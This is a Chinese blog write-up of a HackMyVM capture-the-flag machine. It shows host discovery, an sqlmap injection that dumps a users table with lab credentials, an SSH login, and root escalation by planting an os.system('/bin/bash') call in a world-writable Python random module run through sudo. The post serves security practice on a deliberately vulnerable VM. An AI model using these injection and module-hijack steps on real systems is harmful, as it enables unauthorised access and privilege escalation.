[HackMyVm] Vinulizer

于 2024-03-13 23:09:13 发布
阅读量235 收藏
点赞数 3
分类专栏: hackmyvm 文章标签: 网络空间安全 内网渗透 WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34942239/article/details/136693764
版权
文章描述了一次使用KaliLinux进行网络渗透测试的过程,包括使用ARP扫描发现网络设备,通过Nmap进行端口扫描,发现存在可利用的SQL注入漏洞,进而获取root权限并利用random模块进行权限提升。
摘要由CSDN通过智能技术生成

kali:192.168.56.104

主机发现

arp-scan -l
# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:37:8d:16       PCS Systemtechnik GmbH
192.168.56.119  08:00:27:6d:ec:17       PCS Systemtechnik GmbH

靶机:192.168.56.119

端口扫描

nmap 192.168.56.119
22/tcp open  ssh
80/tcp open  http

目录扫描

​gobuster dir -u http://192.168.56.119 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt


[22:26:45] 301 -  314B  - /img  ->  http://192.168.56.119/img/              
[22:26:50] 200 -  637B  - /login.php

在login界面测试发现可以sql注入

抓包放到sqlmap里面跑

sqlmap -l a.txt --batch --dbs
[*] information_schema
[*] performance_schema
[*] vinyl_marketplace

# sqlmap -l a.txt --batch -D vinyl_marketplace --tables
+-------+
| users |
+-------+

# sqlmap -l a.txt --batch -D vinyl_marketplace -T users --columns
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| id             | int          |
| login_attempts | int          |
| password       | varchar(255) |
| username       | varchar(255) |
+----------------+--------------+

# sqlmap -l a.txt --batch -D vinyl_marketplace -T users --dump
+----+----------------------------------+-----------+----------------+
| id | password                         | username  | login_attempts |
+----+----------------------------------+-----------+----------------+
| 1  | 9432522ed1a8fca612b11c3980a031f6 | shopadmin | 0              |
| 2  | password123                      | lana      | 0              |
+----+----------------------------------+-----------+----------------+

lana登录发现没有东西

shopadmin的password经过md5解密得到addicted2vinyl

但是登录不上网页可以连接ssh

# ssh shopadmin@192.168.56.119
shopadmin@192.168.56.119's password: 
...
shopadmin@vinylizer:~$ 

$ sudo -l
Matching Defaults entries for shopadmin on vinylizer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User shopadmin may run the following commands on vinylizer:
    (ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/vinylizer.py

/opt/vinylizer.py有root权限

但是文件不可修改,只能从模块下手

打开发现引入json和random模块

shopadmin@vinylizer:/opt$ find / -name json.py 2>/dev/null
/snap/lxd/24322/share/openvswitch/python/ovs/json.py
shopadmin@vinylizer:/opt$ ls -al /snap/lxd/24322/share/openvswitch/python/ovs/json.py
-rw-r--r-- 1 root root 16843 Jan 17  2023 /snap/lxd/24322/share/openvswitch/python/ovs/json.py
shopadmin@vinylizer:/opt$ find / -name random.py 2>/dev/null
/snap/core20/1974/usr/lib/python3.8/random.py
/usr/lib/python3.10/random.py
shopadmin@vinylizer:/opt$ ls -al /snap/core20/1974/usr/lib/python3.8/random.py
-rw-r--r-- 1 root root 28802 May 26  2023 /snap/core20/1974/usr/lib/python3.8/random.py
shopadmin@vinylizer:/opt$ ls -al /usr/lib/python3.10/random.py
-rwxrwxrwx 1 root root 33221 Nov 20 15:14 /usr/lib/python3.10/random.py

/usr/lib/python3.10/random.py是有修改权限的,正好又是导入的那个random模块

>>> import random
>>> random
<module 'random' from '/usr/lib/python3.10/random.py'>

修改一下这个包

在import的下面加上

 _os.system("/bin/bash")

然后执行就ok了

sudo /usr/bin/python3 /opt/vinylizer.py
shopadmin@vinylizer:~$ sudo /usr/bin/python3 /opt/vinylizer.py
root@vinylizer:/home/shopadmin# whoami
root

tao0845
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
使用 React 和 Redux 进行井字游戏并附带源代码.zip
07-24
项目:使用 React 和 Redux 进行井字游戏并附带源代码 使用 react 和 redux 的井字游戏是一个简单的 react 项目。整个项目都是使用 react components 和redux制作的。游戏很简单,玩法也很多。要运行此项目,您必须先安装 NodeJS。 关于项目 井字游戏反应而 redux 是使用ReactJS开发的。说到这个游戏,它具有高级功能和游戏玩法。要运行此项目,首先,您必须安装费用到您的系统。然后运行npm安装然后开始运行npm开始。游戏启动后,您可以选择不同的游戏选项。您还可以选择所需的网格框数量。此外,您还可以选择对手的类型。 要运行此项目,您需要 在计算机上安装NodeJS 并使用现代浏览器,例如 Google Chrome、  Mozilla Firefox。 演示: 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
使用 JavaScript 编写的专注力游戏(附源代码).zip
07-24
项目:JavaScript 中的专注力游戏(附源代码) 专注力游戏是一个使用 JavaScript、CSS 和 HTML 开发的简单项目。这款游戏很有趣。玩家必须点击移动的框并获得分数。要点击正确的位置,玩家需要在这个游戏中集中注意力。这款游戏可以帮助玩家练习以进一步增强他们的专注力。 游戏制作 这个游戏项目仅使用 HTML、CSS 和 JavaScript。说到这个游戏的特点,用户必须单击移动框并得分。游戏有三种模式:简单、中等和困难。游戏的 PC 控制非常简单。您只需使用光标单击移动框的碎片即可。 该游戏包含大量的 javascript 以确保游戏正常运行。 如何运行该项目? 要运行此游戏,您不需要任何类型的本地服务器,但需要浏览器。我们建议您使用现代浏览器,如 Google Chrome 和 Mozilla Firefox。要玩游戏,首先,单击 index.html 文件在浏览器中打开游戏。 演示: 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
人脸识别方案资料61EDA-C1590.zip
07-24
人脸识别方案资料61EDA_C1590.zip
316、基于DK124设计的离线式开关电源设计12V 2A(原理图、PCB图、BOM表、设计说明)
07-24
316、基于DK124设计的离线式开关电源设计12V 2A(原理图、PCB图、BOM表、设计说明) 该设计为DK124控制的开关电源,实现12V 2A输出; 功能: 1、使用DK124核心控制; 2、反激式开关电源拓扑设计; 3、实现12V 2A输出; 4、市电输入; 5、整流、滤波、变压器等电路; 6、原理图、PCB图、BOM表、设计说明;
基于Springboot和Vue的生鲜超市管理的设计与实现源码 生鲜超市管理的设计与实现代码(优秀毕业设计)
07-24
生鲜超市管理的设计与实现源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
使用 ReactJs 编写的简单旅行计划器(附源代码).zip
07-24
项目:使用 ReactJS 编写的简单旅行计划器(附源代码) ReactJs 中的简单旅行计划器是一个简单的 JavaScript 项目。该项目是 ReactJS 中待办应用程序的一个简单示例。 关于项目 Simple Trip Planner In Reactjs 是使用ReactJS开发的。这个项目很容易做一种应用程序。这个项目使用 React 库来完成任务。为了运行这个项目,你必须在系统中安装 NodeJs。当你运行这个项目时,你的应用程序从主页开始。从那里你可以导航到菜单。你只能将计划添加到你的书中。你还可以对旅行进行分类。你所要做的就是输入日期和地点,然后选择你想要的旅行计划类型。 要运行此项目,您需要 在计算机上安装ReactJS和 NodeJs,并使用现代浏览器,例如Google Chrome、  Mozilla Firefox。 演示: 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
俄罗斯方块的python代码
07-24
这段Python代码实现了一个简单的俄罗斯方块游戏,使用Pygame库处理图形和用户输入。游戏初始化Pygame库并设置屏幕大小为800x600像素,定义不同颜色和形状的方块。游戏由一个`Tetris`类管理,负责游戏状态和逻辑操作,每个方块由一个`Block`类表示,包含其形状、颜色、位置等信息。 在主循环中,游戏通过事件处理机制响应用户的键盘输入,箭头键用于移动和旋转方块,空格键用于快速下落。游戏会检测方块是否与已有的方块或边界发生碰撞,如发生碰撞,当前方块会固定在场地上并生成新方块。填满的行会被清除,玩家获得相应分数。 游戏通过一个二维数组维护场地状态,每个元素表示一个单元格是否被占据,通过检查和清除单元格实现行消除。整个游戏不断刷新屏幕更新显示,确保流畅运行,绘制背景、方块和边框,使界面美观易理解。 总体而言,这段代码展示了如何使用Pygame库实现经典俄罗斯方块游戏,包括图形绘制、用户输入处理和基本游戏逻辑,让玩家通过移动和旋转方块消除行并获得高分。
绿色金融:“双碳”经济时代,银行业务增长新引擎-埃森哲(
07-24
绿色金融:“双碳”经济时代,银行业务增长新引擎-埃森哲(
基于Springboot和Vue的结合疫情情况的婚恋系统源码 结合疫情情况的婚恋系统代码(高分毕设)
07-24
结合疫情情况的婚恋系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
人脸识别方案资料61EDA-C1618.zip
07-24
人脸识别方案资料61EDA_C1618.zip
精美且实用的Web页面设计模板
07-24
在网页设计领域,Web页面模板是一种预先设计好的布局框架,用于快速构建网站并提供一致的视觉体验。"很实用很漂亮的web页面模板"这个标题暗示了我们正在讨论的是一套高效且美观的模板,适用于那些希望节省时间并创造专业外观网站的设计师或开发者。 描述中的“全部使用的div+css”表明这些模板基于HTML的结构元素`div`和层叠样式表(CSS)进行构建。`div`元素是HTML中最常用的一种容器,可以用来组合、分组其他HTML元素,方便通过CSS进行样式控制和布局管理。CSS则负责定义网页的样式,如颜色、字体、布局以及响应式设计,使网页在不同设备上展示效果良好。 我们要理解Div+CSS布局的优势。传统的表格布局在复杂性和可维护性上往往不如Div+CSS。使用Div+CSS,我们可以实现更清晰的代码结构,提高页面加载速度,同时提供更好的搜索引擎优化(SEO),因为搜索引擎更容易解析结构化的HTML代码。 模板中的每个页面通常会包含头部、导航、主体、侧边栏和页脚等部分,这些都可能由`div`元素定义。CSS将用于设定这些区域的样式,包括它们的大小、位置、背景、边框等。通过浮动(floa
IMG20240603155230.jpg
最新发布
07-24
IMG20240603155230.jpg
DUIlib框架下TabLayout子界面容器化的示范代码
07-24
在IT界,Duilib是一个广泛使用的Windows平台上的UI库,尤其在游戏开发中颇为流行。它提供了一套灵活、高效且易于使用的控件,帮助开发者创建美观的图形用户界面。这个Demo是关于如何在Duilib中将TabLayout的子页面封装为container,以实现更高级别的定制和管理功能。 TabLayout是Duilib中一个非常实用的控件,它允许用户通过不同的tab页切换显示不同的内容区域。在本Demo中,开发者将每个tab页的内容区域进一步封装为独立的container,这样可以更好地管理和控制每个子页面的行为和外观。每个container可以看作是一个自包含的组件,拥有自己的逻辑和通知处理器,能够处理特定的用户交互事件。 我们需要了解容器(container)的概念。在Duilib中,容器是一种可以包含其他控件的对象,它可以管理其内部控件的布局和事件处理。封装子页面为container可以使得代码结构更加清晰,每个container负责一部分特定的功能,有利于代码的维护和扩展。 接下来,我们要关注的是子页面的notify处理器。在Duilib中,控件间的通信通常通过消息
java-springboot+vue的时间管理系统源码(项目源码-说明文档)
07-24
java-springboot+vue的时间管理系统 项目关键技术 开发工具:IDEA 、Eclipse 编程语言: Java 数据库: MySQL5.7+ 后端技术:Springboot 前端技术:Vue、HTML5、css、JavaScript 关键技术:springboot、vue、MYSQL、MAVEN 数据库工具:Navicat、SQLyog
基于python的学生管理系统(源码)
07-24
基于python的学生管理系统(源码) 基于python的学生管理系统(源码) 基于python的学生管理系统(源码) 基于python的学生管理系统(源码) 基于python的学生管理系统(源码)
APM32E103系列单片机之OLED显示(仿江科大工程)
07-24
APM32E103系列单片机之OLED显示(仿江科大工程)
AGV自动导引车PLC控制系统程序
07-24
AGV(Automated Guided Vehicle)即自动导引车,是一种能够自动沿着预定路径行驶的运输车辆,广泛应用于工业自动化领域,如仓库管理、生产线物流等。PLC(Programmable Logic Controller)则是可编程逻辑控制器,是工业自动化控制系统的核心设备,用于控制机械或生产过程。在AGV系统中,PLC程序扮演着至关重要的角色,负责处理AGV的各种动作指令,包括路径规划、障碍物检测、电池管理等。 本压缩包提供的“AGV PLC自控程序”是公司自主研发的AGV系统控制程序,可以作为一个学习和参考的实例。通过分析这个程序,我们可以深入理解AGV与PLC之间的交互机制,以及如何编写高效、稳定的控制逻辑。 AGV系统的控制通常包括以下几个核心模块: 1. **路径规划**:AGV需要根据预设的地图和任务需求,规划出最优的行驶路径。这可能涉及到Dijkstra算法、A*算法等路径搜索策略,以及与上位机的通信,接收作业指令。 2. **导航与定位**:AGV需要准确地知道自己在环境中的位置,以便按照规划的路径行驶。常见的导航技术有磁条导航、二维码导航、激光雷达
2000-2021年 全国各地级市专利申请与获得情况、绿色专利申请与获得情况数据.zip
07-24
数据整理全国各个地级市专利申请量和授权量数据,以及各个地级市绿色专利申请量和授权量数据,专利和绿色专利包括发明专利、实用新型专利、外观专利三种专利和授权量的总和和分别各个专利的申请量和授权量,数据整理2000年至2021年​。 城市专利获得数量是一座城市技术创新能力体现,对城市和企业创新能力进行有效衡量的重要指标。近年来,全国大力实施创新驱动发展和知识产权,着重培养高价值发明专利,激励企业加大自主研发力度。城市创新展示出城市创新 数据指标 地级市、年度、省区划代码、省、市区划代码 、申请专利数、当年申请的发明专利数量、当年申请的实用新型专利数量、当年申请的外观设计专利数量、获得专利、当年获得的发明专利数量、当年获得的实用新型专利数量、当年获得的外观设计专利数量、申请绿色专利、当年申请的绿色发明专利数量、绿色发明占地区年度申请的专利总数百分比、当年申请的绿色实用新型专利数量、 绿色实用新型占地区年度申请的实用新型总数百分比 获得绿色专利、当年获得的绿色发明专利数量、绿色发明占地区年度获得的专利总数百分比 当年获得的绿色实用新型专利数量、绿色实用新型占地区年度获得的实用新型总数百分比
年终总结汇报PPT模板(23)三篇文件.pptx
07-24
年终总结汇报PPT模板(23)三篇文件.pptx
Android jChat 1.3.rar
07-24
Android jChat 1.3
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tao0845

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值